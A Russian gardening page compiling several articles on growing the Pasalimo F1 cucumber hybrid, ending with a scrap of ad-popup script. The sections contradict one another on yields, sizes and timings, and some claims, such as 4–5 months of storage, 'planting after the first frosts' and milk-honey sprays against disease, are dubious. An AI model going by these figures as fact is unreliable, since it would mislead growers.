7 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание огурцов сорта пасалимо

Огурец Пасалимо: описание сорта, фото, отзывы

Лидером отечественных огородов по праву считается огурец. Отсутствие этого демократичного продукта на грядках и столах представить невозможно. Видимо, поэтому селекционеры не оставляют работу по созданию новых сортов и гибридов. И изыскания эти весьма успешны.

Пасалимо, огурцы: описание сорта

Позиционируемый селекционно-семеноводческой голландской фирмой Syngenta Seeds B. V. этот огурец включен в госреестр РФ в 2005 году и уже более 12 лет культивируется на дачных участках и в фермерских хозяйствах. Гибрид допущен к возделыванию во всех регионах страны и одинаково успешно растет на открытых грядах и в тепличных условиях. Универсальность сорта объясняется его свойствами партенокарпика, т. е. классического опыления пчелами он не требует.

Огурец Пасалимо – гибрид с удивительно малым периодом вегетации, рамки которого ограничиваются всего 39-41-м днем, зато плодоношение его продолжается до самых холодов. Корнишонный тип овоща дает возможность собирать плоды разной степени спелости и размеров:

• пикулей — в 3-5 см;

• корнишонов — в 5-8 см.

Культура женского типа, не имеющая пустоцветов, среднерослая, индетерминантная, т. е. с неограниченно растущим центральным побегом.

Огурец Пасалимо покрыт кожицей яркого изумрудного цвета с чуть выраженной пятнистостью и нечеткими светлыми черточками. Гибрид обладает превосходной хрустящей мякотью, лишенной неприятной горечи.

Урожайность и устойчивость к заболеваниям

Сорт замечателен весьма высоким процентом выхода качественной товарной продукции, который составляет почти 96 % по выращенным овощам в теплице и чуть меньший показатель по урожаю с открытых грядок. С 1-го квадратного метра обычно снимают 13-15 кг огурцов. После сбора урожая плоды достаточно долго сохраняют свои товарные качества. Даже не снятые вовремя зеленцы не перерастают. Огурец Пасалимо, фото которого представлено в статье, универсален. Он употребляется в свежем виде, великолепен в маринадах, соленьях, закусках, так как плотная структура мякоти гибрида препятствует образованию пустот при тепловой обработке.

Достоинством гибрида является и высокая устойчивость к таким огуречным напастям, как мучнистая роса, кладоспориоз, вирус огуречной мозаики, способным погубить львиную долю урожая.

Итак, достоинствами сорта являются высокие вкусовые свойства, одномерность плодов, хорошая урожайность, устойчивость к типичным болезням, транспортабельность и товарность.

Огурец Пасалимо: особенности посадки

Наиболее высокие урожаи гибрид дает на плодородных, дренированных суглинистых почвах. Как и все огурцы, Пасалимо (отзывы овощеводов подтверждают) неравнодушны к обилию света и тепла. Поэтому, выбирая участки для посадки, руководствуются именно этими критериями. Лучшими предшественниками считаются пасленовые, лук, бобовые и крестоцветные.

Выращивают гибрид рассадой или семенами, которые сеют сразу в теплицу. Почва к времени посева должна быть прогрета до 15-18 °С, поскольку огурец – растение теплолюбивое. Поэтому примерными сроками высадки Пасалимо в средних и умеренных широтах страны считают период с 15 по 25 мая, хотя ориентироваться приходится на погоду, установившуюся в регионе. Оптимальные дневные температуры, необходимые растению для качественного развития, не должны быть ниже 22-24 ˚С, ночные – 18 ˚С.

Уход за рассадой

Сорт огурцов Пасалимо дает рослые, но хрупкие всходы. Поэтому знающие овощеводы рекомендую высевать их на рассаду сразу в отдельные емкости. Это значительно улучшит состояние сеянцев, не задержит их в росте, укрепит стебель и в краткие сроки разовьет сильную корневую систему.

Рассаде необходим хороший уход, заключающийся в достаточном освещении и поддерживании температуры воздуха на уровне 20-25 °С. Поливают проросшие сеянцы весьма умеренно, избегая излишнего увлажнения. Оно может вызвать бактериальные инфекции. Важно помнить, что рассадный период для огурца довольно ограничен и не превышает 25-30 дней. Переросшие сеянцы тяжело и долго приживаются.

Подготовка почвы

Опытные огородники рекомендуют высаживать огурцы в высокие грядки с небольшим уклоном к югу, они значительно быстрее прогреваются на солнце и хорошо держат тепло. Огурцам требуются почвы с низким содержанием азота. Кислые грунты необходимо известковать.

Готовить место под посадку начинают с осени. Под перекопку вносят 10 кг свежего навоза либо 60-70 г фосфорно-калийных соединений на 1 кв. метр. Весной участок еще раз тщательно разрыхляют.

Подготовка теплицы и посадка

Перед посадкой в теплицу нужно учесть некоторые особенности закрытого выращивания, поскольку без соответствующей обработки трудно избежать инфекционного поражения, несмотря на хороший иммунитет гибрида Пасалимо.

Уход за культурой

Пасалимо относят к сортам со средним образованием боковых побегов, контролировать появление которых следует обязательно, чтобы растение не наращивало зеленую массу в ущерб плодообразованию. После 6-8-го листа верхушку центрального стебля прищипывают, провоцируя ветвление. Для плодоношения оставляют 1-2 крепких стебля, другие боковые пазушные побеги обрезают. За огуречными посадками тщательно следят, содержат их в чистоте, периодически поверхностно и аккуратно рыхля и удаляя сорняки. Поливают исключительно теплой водой, которую подают под корень, избегая увлажнения растения целиком.

Тепличное возделывание огурца предполагает использование вертикальных опор, позволяющих увеличить количество растений и получать высокие урожаи здоровых плодов, не соприкасающихся с почвой.

Подкормки огурцов

Растения подкармливают 3-4 раза за сезон. Через неделю после высадки рассады в грунт сеянцы удобряют раствором карбамида, сульфата калия и суперфосфата (по 15 г каждого препарата на 10 л воды). В дальнейшем подкормки осуществляют каждые 2 недели, давая растениям по 1-1,5 литра настоя навоза (1 л/10 л воды) или перепревшей зеленой массы.

Итак, мы перечислили основные агротехнические приемы выращивания огурца Пасалимо – перспективной и высокоурожайной культуры.

Огурец Пасалимо

Огурцы корнишоны голландской селекции всегда остаются фаворитами на грядке. Они хороши в засолке и свежем виде, а урожайность огурцов таких сортов на высшем уровне. Описание и отзывы об огурце Пасалимо F1 только подтверждают это.

Описание огурцов Пасалимо F1

Впервые в России об этих огурцах услышали в 2005 г., когда они попали в Госреестр. Огурцы сорта Пасалимо выращивают повсеместно, их культивируют в теплицах и открытом грунте. Гибрид подходит для малого частного хозяйства и промышленного выращивания. Оригинатор сорта – фирма “Syngenta” Seeds B. V.

Огурец Пасалимо – партенокарпический гибрид, чем объясняется его универсальность. Растения сорта не требуют опыления насекомыми. В плодоношение вступают рано, уже спустя 38-42 дня можно снимать первый урожай. Новая завязь образуется до самых заморозков.

Кусты среднерослые, центральный побег в росте неограничен. Листья светло-зеленые, опушенные, небольшие. Тип завязи пучковой. В одной пазухе образуется до 6 плодов.

Плоды сорта Пасалимо корнишонного типа, бугорчатые, одномерные. Средний вес достигает 80 г. Зрелый плод снимают, когда его длина достигает 5-8 см. Кожица огурцов плотная, темно-зеленого цвета, опушенная, по всей поверхности размытые белые полосы. Чтобы вырастить огурцы Пасалимо, как на фото ниже, нужно придерживаться рекомендаций из описания сорта.

Вкусовые качества огурцов

Мякоть огурца Пасалимо на генном уровне лишена горечи, плотная, хрустящая.

Огурцы сорта подходят для свежего потребления и маринации. Корнишоны Пасалимо хорошо сохраняют свои вкусовые качества в банках.

Плюсы и минусы сорта

Огурцы Пасалимо долго сохраняют товарный вид, хорошо переносят транспортировку. Не перерастают, если их оставить на кустах и не собрать вовремя. Но это далеко не все положительные качества гибрида, у голландских огурцов есть много достоинств:

  • большой выход товарной продукции;
  • высокая урожайность;
  • универсальность выращивания;
  • отличный иммунитет растения;
  • небольшой размер плодов;
  • отменные вкусовые качества;
  • товарный вид.

Недостатков у гибрида Пасалимо за все время выращивания не замечено.

Оптимальные условия выращивания

Не стоит сажать культуру на сквозняке или в закисленную почву. Лучшее место для голландского гибрида – теплый солнечный участок, хорошо защищенный от холодных ветров. Почва при этом на грядке должна быть плодородной на глубину до 30 см. Под перекопку можно внести перегной, торф, перепревшие опилки, минеральные комплексы и золу.

Хорошие предшественники огурцов Пасалимо на грядке:

А вот после тыквенных культур высаживать гибрид не стоит. У растений общие болезни и вредители, поэтому избежать их будет сложно.

Выращивание огурцов Пасалимо

Огурец Пасалимо можно выращивать рассадным способом или посевом прямо в грунт. Второй способ больше подходит для регионов с теплым климатом, где весна мягкая, а заморозки наступают поздно.

Прямая посадка в открытый грунт

Поскольку огурцы – теплолюбивая культура, сажать семена на грядку нужно не ранее мая, когда почва прогреется до температуры +15… +18°С. При этом температура окружающей среды днем должна быть на уровне +20… +22°С, а ночью – не ниже +15°С.

Исходя из особенностей огурца Пасалимо, расстояние между семечками делают 15-20 см. В дальнейшем всходы прореживают, оставляя самые сильные. Расстояние между растениями в ряду должно составлять 45-50 см. Междурядья формируют широкие – около 70 см.

Выращивают огурцы Пасалимо вертикальным способом. По мере роста плеть направляют и закручивают вокруг шпалеры.

Выращивание рассадным способом

Сорт огурцов Пасалимо рано вступает в плодоношение, поэтому на рассаду его сеют в конце апреля или начале мая. Все зависит от региона выращивания.

Предварительную подготовку семян можно пропустить, так как оригинатор утверждает, что все необходимые процедуры проведены заранее. Для выращивания рассады выбирают контейнеры объемом 500 мл. Грунт обязательно должен быть рыхлым и питательным, чтобы семечки получили максимум полезных веществ.

После посадки огурцов Пасалимо емкости накрывают пленкой и убирают в теплое место. Почву регулярно поливают, чтобы она не пересыхала. Первые всходы появятся через 3-5 дней. После чего пленку снимают и продолжают выращивать рассаду.

Через 14 дней делают первую подкормку минеральными удобрениями. Как только появятся настоящие листья, рассаду нужно приучать к окружающей среде – ее ненадолго выносят на улицу. За несколько дней до пересадки огурцы должны провести на воздухе всю ночь.

Полив и подкормка

На постоянном месте за огурцами Пасалимо нужно правильно ухаживать, чтобы добиться хорошего урожая. Опытные огородники советуют следить за влажностью грунта и своевременно подкармливать растения минеральными и органическими растворами.

Поливать почву на грядках нужно часто, чтобы земля была увлажненной постоянно. В период засухи кусты мульчируют перегноем, чтобы сохранить влажность грунта, иначе завязь опадет, а новая не будет появляться.

Подкармливают огурцы Пасалимо на протяжении всего сезона каждые 10 дней. Минеральные подкормки чередуют с органикой. Используют удобрения с гуматами, золу, отвар зеленых трав, крапивы, дрожжевые настои.

Формирование

Чтобы урожай был максимальным, кусты огурцов сорта Пасалимо нужно правильно сформировать. После появления 5-6-го листа основную плеть прищипывают, чтобы стимулировать рост боковых побегов. Именно на них в дальнейшем будет формироваться основной урожай.

Кроме того, до 6-го листа все цветки и боковые побеги нужно удалить. По мере роста куста нижние листья также обрезают, чтобы растения хорошо проветривались. Отплодоносившие побеги вырезают, чтобы стимулировать рост новых завязей. Если куст правильно сформировать, то плодоносить он будет до самых заморозков.

Защита от болезней и вредителей

В описании сорта Пасалимо указано, что кусты огурцов обладают хорошим иммунитетом, противостоят самым распространенным заболеваниям:

  • мучнистая роса;
  • кладоспориоз;
  • огуречная мозаика.

Однако неправильный уход, полив холодной водой, частые осадки, недостаток солнца и другие причины могут спровоцировать вспышку заболеваний. Чтобы не допустить этого, кусты нужно опрыскать препаратами с содержанием меди.

Ослабленные растения часто поражают вредители, такие как тля, паутинный клещ и белокрылка. Это существенно снижает урожайность, поэтому в целях профилактики огурцы Пасалимо обрабатывают народными средствами или химическими препаратами.

Урожайность

Урожайность огурцов Пасалимо на высоте. По отзывам о данном сорте и по фото, которыми пестрит интернет, в теплицах и под пленкой можно собрать от 13 до 15 кг с кв. м. В открытом грунте эти показатели ниже, но все равно они превышают самые известные сорта. Выход товарной продукции доходит до 96%.

Заключение

Описание и отзывы об огурце Пасалимо F1 свидетельствуют, что голландский гибрид дает стабильный урожай. Плоды вкусные, хорошо сохраняют свои качества при засолке. Выращивать огурцы сорта несложно, достаточно придерживаться общих правил.

Сорт огурцов Пасалимо F1

Относительно недавно на садоводческих рынках появился новый сорт – огурец Пасалимо F1. Культура была выведена в Нидерландах и удачно сочетает в себе многие положительные качества, которые огородники хотят видеть в овощах.

Сорт огурцов Пасалимо F1

Характеристика сорта

Огурцы Пасалимо относят к гибридным культурам, поэтому самостоятельно собрать семена нельзя. Каждый год необходимо приобретать новый посадочный материал.

Растение подходит для выращивания на открытых участках и в тепличных условиях. Рекомендуют использовать второй способ, тогда цветение будет обильным и постоянным, а урожайность высокой.

Сорт раносозревающий, самоопыляющийся, его плоды универсальны в применении. Их используют как в свежем виде, так и для зимних заготовок и консервации.

Небольшие размеры огурцов и их привлекательный внешний вид позволяет проводить сбор на стадии пикулей (2-6 см) и корнишонов (6-9 см).

Урожайность

Пасалимо относят к высокоурожайным сортам. На одной ветке растение способно сформировать 6-8 качественных плодов.

За сезон, при благоприятных условиях, можно собрать 15-17 кг/м². Огурцы созревают синхронно, дружно. Сбор плодов проводят ежедневно, чтобы не допустить их перезревание.

Описание растения

Кусты обладают следующими признаками:

  • среднерослые, основная ветка крепкая, хорошо развита;
  • тип цветения преимущественно женский;
  • листья светло-зеленого цвета, небольшого размера;
  • листовая пазуха формирует 6-7 плодоносящих завязей.

Описание плодов

Огурец Пасалимо цилиндрической формы, на кожуре явно заметны крупные бугорки. Размеры плодов приблизительно одинаковые, длина одного экземпляра достигает 7-10 см, при весе 70-100 г.

Мякоть овощей сочная, хрустящая, без признаков горечи. Ярко ощущается характерный для огурцов аромат.

Болезни и их профилактика

Согласно описанию, сорт огурцов Пасалимо устойчив к таким типичным для всей культуры заболеваниям, как оливковая пятнистость, огуречная мозаика и мучнистая роса.

В качестве профилактических мероприятий регулярно (1 раз в 7-10 дней) проводят их опрыскивание медово-молочным раствором. Также это помогает защитить культуру от вредных насекомых и дополнительно питает полезными микроэлементами.

Достоинства и недостатки

Гибридный сорт Пасалимо был получен в результате смешения более 10-ти сортов огурцов. От каждого из них растение взяло определенные положительные качества, среди которых выделяют:

  • культура устойчива к большинству заболеваний;
  • плоды созревают одновременно, поэтому урожай можно собрать в сжатые, короткие сроки;
  • овощи хорошо хранятся (4-5 мес.), легко переносят транспортировку, обладают высокими вкусовыми качествами;
  • несобранные вовремя плоды не желтеют, только приобретают крупные размеры и жесткую кожуру;
  • зеленцы обладают универсальным характером применения, имеют отличный товарный вид.

Существенных недостатков в описании разновидности нет. Единственный минус – невозможность самостоятельно собрать семена для посева культуры на следующий год.

Выращивание

Сорт отличается урожайностью

Компактные размеры куста позволяют выращивать огурцы на небольших участках. Независимо от того, где выращивается растение – в теплице или открытом грунте, молодые саженцы первое время необходимо держать под пленочным укрытием. Это позволит им быстрей окрепнуть, повысит иммунитет и устойчивость культуры к возможным неблагоприятным погодным условиям.

Вегетационный период короткий: с момента появления первых всходов до первого урожая проходит 35-40 дней. Плодоношение происходит волнообразно и продолжается до наступления холодов. Плоды созревают дружно.

Рассадный метод выращивания

Для получения более раннего урожая выращивают культуру рассадным способом. Предварительной обработки посевной материал не требует, производители реализуют его уже продезинфицированным и витаминизированным.

Для ускорения прорастания проводят проращивание: помещают в увлажненную ткань на 1-3 дня. Регулярно ее опрыскивают теплой водой, не допуская подсыхания.

Семена огурцов Пасалимо на рассаду сеют в начале апреля, пересадку на постоянное место в этом случае необходимо будет осуществлять в середине мая. Посев в общий контейнер предусматривает последующее их пасынкование по отдельным емкостям (на стадии развитых 2-х настоящих листков).

Семена помещают в плодородную, обогащенную полезными веществами и умеренно увлажненную почву на глубину 1-1,5 см. Ящики прикрывают полиэтиленовой пленкой или стеклом и ставят в теплое место до появления первых всходов.

После этого полиэтилен снимают, а емкость переносят на солнечное место для дальнейшего роста и развития рассады.

При пересадке растений на постоянное место придерживаются следующей схемы: между растениями оставляют 30-40 см, между рядами – 70-80 см. Тепличное выращивание позволяет осуществлять более густую посадку.

Уход заключается в регулярном проведение таких агротехнических мероприятий, как полив, прополка, рыхление почвы, осуществление профилактических мер по предупреждению заболеваний растения.

Полив проводят регулярно, но умеренно, не допуская переувлажнения почвы. Рекомендуют использовать слегка подогретую, отстоянную или дождевую воду. Преимущество отдают капельному методу полива, когда вода планомерно подается под корень в небольших количествах. Увлажнять почву нужно в вечернее время, после сбора урожая.

Послеэтого между кустами рыхлят почву, а также осуществляют прополку участка от сорняковой травы. Это позволит сохранить в грунте максимальное количество питательных веществ и влагу, а также улучшит доступ свежего воздуха к корневой системе.

Периодически, 4-5 раз за сезон, проводят подкормки. Для этого используют минеральные, органические и комплексные удобрения, чередуя их между собой. В период формирования завязей рекомендуют применять калийно-фосфорные подкормки.

Безрассадный метод посадки

Можно провести посев семян непосредственно в грунт.

Плодоношение в этом случае будет существенно ниже и позже, чем при рассадном методе выращивания.

Помещать семена в открытую почву необходимо, когда грунт хорошо прогреется, а также исчезнет риск резкого перепада температуры. Сроки для каждого региона определяются индивидуально (начало–конец мая).

После посева грядку необходимо укрыть пленкой. Это обезопасит огурцы от возможного промерзания, создаст парниковый эффект, который будет способствовать более активному прорастанию семян.

Сорт Пасалимо чувствителен к изменениям погоды, поэтому важно следить за температурным режимом в период формирования растения. При резком ухудшении погодных условий, лучше укрыть участок с огурцами пленкой.

Схема посадки аналогична рассадному способу выращивания.

Описание огурцов сорта Пасалимо

Огурцы сорта Пасалимо – это ранний гибридный вид, который относительно недавно появился на рынке Российской Федерации. Впервые сорт был выведен селекционером из Нидерландов. Он пытался создать оптимальный сорт для того, чтобы его можно было выращивать и в домашних условиях, и в теплицах, и, конечно, в открытом грунте, и чтобы постоянно сохранялся процент плодоношения.

Описание огурцов сорта Пасалимо

Характеристика сорта

Сорт огурцов Пасалимо – это гибридный вид, который размножается пучкованием, то есть на одной основной ветке сразу может появиться более 8 плодов, они через некоторое время смогут созреть, причем, синхронно.

Пасалимо – это довольно урожайный сорт, который за период цветения может дать свыше 15 кг. Сорт довольно светолюбивый, поэтому, когда будете выбирать место для посадки, то выбирайте большой участок, который большую часть времени находится под солнцем. Благодаря своему раннему созреванию у сорта хороший процент урожайности, кроме того, он самоопыляющийся.

Большая часть специалистов рекомендует производить выращивание такого сорта в теплых условиях, чтобы цветение было синхронным и постоянным. Пасалимо подходит как для свежего использования, так и для заготовки консервации, также отлично подойдет для свежих салатов. Такой сорт идеально подойдет для того, чтобы собирать пикули и корнишоны 2- 6 и 6-9 см соответственно.

Описание растения

В большей части в растении доминируют женские типы цветения, все кусты среднерослые и имеют большой потенциал для роста главной ветки.

Листья у растений светлые, маленького размера. Одна листовая пазуха может формировать более 6 завязей, которые потом будут созревать одинаково. Главное – вовремя их обработать и посадить в ранее время года, но после первых морозов.

Описание плода

Все огурцы имеют цилиндрическую форму, все они одного размера с крупными бугорками на кожице. В среднем, длина одного плода может достигать 7-10 см, а вес плодов может быть минимальный 70 и максимальный 100 г.

На кожице есть небольшие короткие белые пятна и полоски, которые не всегда видны. Шипы белые с легко опушенным уплотнением. Опытные садоводы говорят, что мякоть довольно хрустящая без каких- либо признаков горечи.

С 1 м2 можно получить более 12-15 кг., выход продукции после уборки составляет – 97 %. Как уже говорилось раньше, огурцы универсальные и подходят для любого применения.

Преимущества и недостатки

На самом деле, благодаря своей гибридности и смешению различных сортов огурцов (более 10) у сорта много положительных сторон. Плюсы сорта:

  • устойчивость ко многим заболеваниям и вредителям;
  • если вовремя не соберете плоды, то можете не переживать, они не пропадут и не пожелтеют;
  • могут долгое время храниться;
  • нормально переносят транспортировку;
  • отменные вкусовые качества;
  • универсальность использования;
  • сорт быстро спеет;
  • отличный товарный вид;
  • при правильном хранении может пролежать более 4 -5 месяцев.

Выращивание

Сорт порадует вас ранним урожаем

Такой сорт отлично подойдет для огородных участков, небольших фермерских хозяйств и садов приусадебного типа. Для того, чтобы культивировать растение, его нужно посадить в открытой почве и постоянно держать под пленочным укрытием, неважно, где будет прорастать: в теплице, парнике или домашних условиях.

Описание огурца Пасалимо f1 и отзывы о нем приятно удивят. Садоводы нахваливают этот вид за его уникальные характеристики. С самого начала посадки и со сбора плодов проходит короткий период: в среднем, он составляет 40 дней. Период плодоношения – до самых холодов, как только вы соберете одни плоды, через время вырастут другие.

Посадка в открытом грунте

Чаще всего, такой сорт сажают под пленочным укрытием в теплицах и парниках, тогда с плодами будет намного меньше проблем.

Посадка может быть, как сухими семенами, так и способом рассадки. Именно последний способ лучше всего подходит, в том случае, если вы хотите получить отличный процент урожайности.

Когда будете выращивать рассаду, внимательно смотрите за температурным режимом, так как он очень важен для этого сорта. Почва для посадки должна быть теплой и прогретой, также важен показатель температуры воздуха.

Самая оптимальная температура считается 23-28 градусов по Цельсию. Поэтому, если вы будете соблюдать все рекомендации, то уже через 23 дня вы сможете получить готовую рассаду.

Когда сеять семена

Для того, чтобы получить рассаду семян, можно начать весь процесс в апреле, сажать в почву лучше всего в начале мая. Схема высадки растения стандартная, главное увлажнить почву и сделать ямку 45 см на 60 см и глубину 2-3 см.

Также необходимо ухаживать за грядками, постоянно их пропалывать, убирать все сорняки, не забывать подкармливать органическими и минеральными добавками по очереди. В общем, за весь сезон необходимо провести, как минимум, 5 подкормок.

Не забывайте убирать сухие и больные листья вместе с плодами для того, чтобы не происходило никакого заражения. И, конечно, постоянный полив растений, особенно, когда будет период плодоношения. Поливайте в вечернее время после того, как соберете огурцы.

Заболевания и профилактика

Паласимо устойчив ко многим заболеваниям, такие, как огуречная мозаика, мучнистость росы, пятнистость только оливкового типа. Для того чтобы плоды совсем не болели раз в неделю обрызгивайте их раствором молока и меда, это защитить от вредителей, а также даст дополнительные витамины и минерала.

Для засолки и салатов выбирайте урожайный огурец Пасалимо F1

Доброго дня, уважаемые дачники. Разговор сегодня будет посвящен одному из голландских гибридов, который относится к огурчикам корнишонам. Огурец Пасалимо F1, возможно, не так известен, как другие его собратья-голландцы, но те, кто его выращивал, остались довольны. И если есть желание посадить корнишоны, то этот гибрид вполне подойдет.

Описание гибрида Пасалимо F1

Голландские агрокомпании известны своим качественным семенным материалом, и фирма Syngenta Seeds B.V. не является исключением. Именно эта компания представила на рынке гибрид огурца корнишона Пасалимо F1 – урожайного и неприхотливого в выращивании.

В 2005 году гибрид включен в Госреестр, возделывают его во всех регионах и вполне успешно. Куст Пасалимо – среднерослый, индетерминантного типа. Он является партенокарпическим гибридом, в опылении насекомыми не нуждается.

Красивые кусты имеют светло-зеленые опушенные листочки, в пазухах основного стебля и боковых побегов формируется от 6 до 10-12 завязей. Зеленцы гибрида – выровненные, с белыми шипами, присутствует небольшая бугристость. Кожица имеет яркий изумрудный оттенок, есть еле видимые белые полоски (смотрите фото).

Размер огурчиков – 8-9 см, можно снимать плоды и в стадии пикулей, когда они достигают длины 3-4 см. В среднем масса плода – 80 граммов.

Мякоть очень плотная, сочная, с характерным хрустом. Вкус – отменный. Огурчики очень хороши в свежем виде, также их используют в засолку и консервацию. Плоды огурца Пасалимо идеально подходят для консервирования корнишонами и пикулями, при этом зеленцы сохраняют хруст и аромат.

Урожайность гибрида высокая, и даже в неблагоприятных условиях, при перепадах температур и не очень жарком лете можно получить хорошие результаты. При хорошем уходе с одного квадратного метра грядки собирают примерно по 12-13 кг вкуснейших огурчиков-корнишонов.

Особенности агротехники гибрида Пасалимо F1

Семенной материал от голландских компаний отличается высоким качеством, хорошей всхожестью. Семена проходят специальную обработку:

  • протравливание;
  • термическое закаливание;
  • калибровку.

Поэтому перед посевом семена голландских гибридов не нуждаются в дезинфекции или замачивании.

НА ЗАМЕТКУ! Особо отметим, что речь идет о настоящих семенах гибридов огурцов, а не о подделках.

В условиях средней полосы России, а также в регионах Сибири, Северо-Запада, Урала лучше всего выращивать гибрид через рассаду. Заранее с осени готовят грядку под огурцы, стараясь подбирать для огурчиков самые солнечные, защищенные от ветров места. Нельзя высаживать огурчики каждый год на одну и ту же гряду, а вот участки, где росли томаты, капуста или лучок будут самым лучшим вариантом.

Сроки посева семян на рассаду зависят от региона. В средней полосе это обычно последние дни апреля, чтобы в мае огурцы можно было определить на постоянное место. В более суровых регионах сорт огурцов Пасалимо сеют семенами на рассаду в мае, так как на грядку рассаду можно высадить будет не ранее первой недели июня.

Рассада должна иметь возраст три-четыре недели, быть крепкой, не вытянутой и с 3-4 настоящими листиками.

Схема высадки – 50х50 см.

Поливают огурчики регулярно, при этом обязательно контролируют уровень влажности почвы, а в теплицах – еще и уровень влажности воздуха. Огурцы любят влагу, но не переносят переизбытка ее, сбрасывая от этого цвет и подхватывая различные гнили. Если же поливы будут недостаточными, то урожайность будет снижаться, а сами огурчики не будут сочными.

ВАЖНО! Поливают огурцы только теплой водой, температура – +22…+25º

Огурцы хорошо отзываются на рыхление, только проводить его надо очень аккуратно, стараясь не повредить расположенные в верхнем слое почвы корешки растения.

За период выращивания гибрид нужно регулярно подкармливать. Для этого в первый период вегетации используют азотные удобрения, во второй половине дают больше калия, фосфора.

Огурец Пасалимо F1 является гибридом, который устойчив к большинству заболеваний:

  • кладоспориозу;
  • мучнистой росе;
  • различным гнилям.

Но это не значит, что можно обойтись без профилактики болезней, ведь всем известно, что лучше предупредить инфекцию, чем потом заниматься лечением растений.

Для обработки можно использовать растворы йода, молочной сыворотки, настои древесной золы. Такие средства позволяют уберечь растения от болезней, некоторых вредителей, при этом избежать использования опасной «химии».

Формировка гибрида огурца Пасалимо простая: в нижних четырех пазухах удаляют все завязи и побеги, далее до шпалеры оставляют в пазухах завязи и удаляют боковые побеги. Как только стебель достигнет самой шпалеры, можно оставить там два три боковых побега, а основной стебель перекинуть.

«Плюсы» и «минусы» гибрида огурца Пасалимо F1

Для многих дачников приоритетом в характеристике при выборе семян огурца является их урожайность, а также простота в уходе. Гибрид из Нидерландов Пасалимо полностью подходит под такие параметры:

  • урожайный;
  • неприхотливый;
  • с высочайшими вкусовыми качествами.

Он отлично растет под открытым небом, дает высокие урожаи в теплице. Важно, что для завязывания плодов не нужно опыление насекомыми, и это огромный «плюс» для многих огородников.

Красивые и вкусные корнишончики гибрида пригодны для всех видов консервации, отлично подходят для засолки в банках, в кадушках и бочках, вкусны в маринадах. Также они хороши в свежем виде.

Мякоть их хрусткая, сочная и плотная, у нее отсутствует горький привкус, но зато есть приятный аромат. Такие огурчики любят ребятишки, предпочитающие снимать их прямо с куста и хрустеть свежим зеленцом.

Преимуществом является и способность гибрида противостоять болезням, давать высокий урожай, даже если летний сезон был неблагоприятным для огурцов.

Есть ли у огурца Пасалимо F1 «минусы»? Да, и к ним относятся:

  • достаточно высокая стоимость семенного материала (но расходы с лихвой окупаются урожаем огурцов);
  • невозможность брать с растений свои семена для посева на следующий год.

Во всем остальном тот гибрид, судя по отзывам, отлично зарекомендовал себя, так что он достоин более пристального внимания со стороны дачников.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
